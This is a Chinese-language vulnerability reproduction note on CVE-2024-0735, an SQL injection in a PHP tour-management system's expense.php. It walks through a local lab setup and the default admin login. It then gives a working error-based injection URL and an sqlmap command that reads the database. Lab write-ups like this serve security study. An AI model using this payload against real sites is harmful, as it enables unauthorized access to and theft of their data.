CVE-2024-0735
免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与本平台和发布者无关!!!
漏洞名称
SourceCodester在线旅游管理系统expense.php exec sql注入漏洞
漏洞影响
SourceCodester在线旅游管理系统,源码下载地址如下
https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html
漏洞描述
SourceCodester是使用PHP和MySQL的在线旅游和旅行管理系统项目。具有完整的源代码,可用于学术项目目的。在该系统/admin/operations/expense.php接口处存在SQL注入漏洞。
想挖洞的同学可以看下其他几个项目
https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html
靶场搭建
靶场使用小皮面板工具搭建,没有的自行安装
https://www.xp.cn/
靶场源码下载
https://www.sourcecodester.com/download-code?nid=14510&title=Online+Tours+%26+Travels+management+system+project+using+PHP+and+MySQL
下载后解压
对源码再次解压
将tour文件夹复制到小皮网站的物理路径下
找到config.php文件,修改MySQL的用户名密码
在MySQL中创建数据库
create database tour1;
在解压目录下找到tour1.sql,并在数据库中执行语句,完成数据库初始化
然后重启nginx
访问网站http://localhost/tour/
靶场搭建成功
用户名密码:
Username : mayuri.infospace@gmail.com
Password : admin
漏洞复现
漏洞url
/admin/operations/expense.php
这是个get请求,可以直接在浏览器访问
http://localhost/tour/admin/operations/expense.php?id=1%27%20AND%20EXTRACTVALUE(1586,CONCAT(0x5c,0x7176626271,(SELECT%20(ELT(1586=1586,1))),0x7162717871))%20AND%20%27Vqhf%27=%27Vqhf
使用sqlmap查看数据库
sqlmap.py -u http://localhost/tour/admin/operations/expense.php?id=1 --current-db
修复建议
自行修改源码修复。
本文是原创文章,采用 CC BY-NC-ND 4.0 协议,完整转载请注明来自 程序员小航
评论
匿名评论
隐私政策
你无需删除空行,直接评论以获取最佳展示效果